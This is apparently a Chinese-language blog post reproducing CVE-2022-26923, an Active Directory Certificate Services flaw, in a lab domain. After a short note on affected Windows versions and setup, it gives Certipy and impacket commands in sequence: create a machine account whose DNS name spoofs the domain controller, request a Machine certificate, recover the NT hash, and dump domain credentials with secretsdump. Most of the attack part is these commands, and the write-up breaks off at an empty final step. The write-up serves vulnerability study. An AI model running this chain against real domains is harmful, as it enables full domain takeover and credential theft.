cve-2022-26923复现——域提权漏洞复现
cve-2022-26923复现
cve-2022-26923——域提权漏洞复现
文章目录
- cve-2022-26923复现
- 前言
- 一、环境搭建
- 二、使用工具
- 三、漏洞复现(在已经拿到一个域控普通账户的前提下)
前言
Active Directory域权限提升漏洞(CVE-2022-26923)允许低权限用户在安装了 Active Directory证书服务(AD CS)服务器角色的默认Active Directory环境中将权限提升到域管理员。
影响范围:
Windows 8.1
Windows 10 Version 1607, 1809,1909, 2004, 20H2, 21H1, 21H2
Windows 11
Windows Server 2008,2012,2016,2019,2022
一、环境搭建
首先无脑搭建一个域控服务器,安装了Active Directory证书服务(AD CS),并新建一个普通用户(test1)。
本次使用的是:win server2019
二、使用工具
github上无脑下载
Certipy-4.4.0
impacket-master套件
三、漏洞复现(在已经拿到一个域控普通账户的前提下)
1、创建machine account
certipy account create -u test1@attack.local -p TESTtest@123 -user "testpc1" -dns "WIN-CL222QGDIFI.attack.local"
2、申请CA证书
certipy req -username testpc1\$@attack.local -password LIloPSXJlESPOn1G -ca attack-WIN-CL222QGDIFI-CA -target attack.local -template Machine -debug
3、获取machine account的NT hash
certipy auth -pfx win-cl222qgdifi.pfx
4、获取域控账户的hash值
secretsdump.py 'attack.local/WIN-CL222QGDIFI$@attack.local' -hashes aad3b435b51404eeaad3b435b51404ee:fcaae1b2fef3be0a0d6c30332fb11b70
6、连接域控
还没有评论,来说两句吧...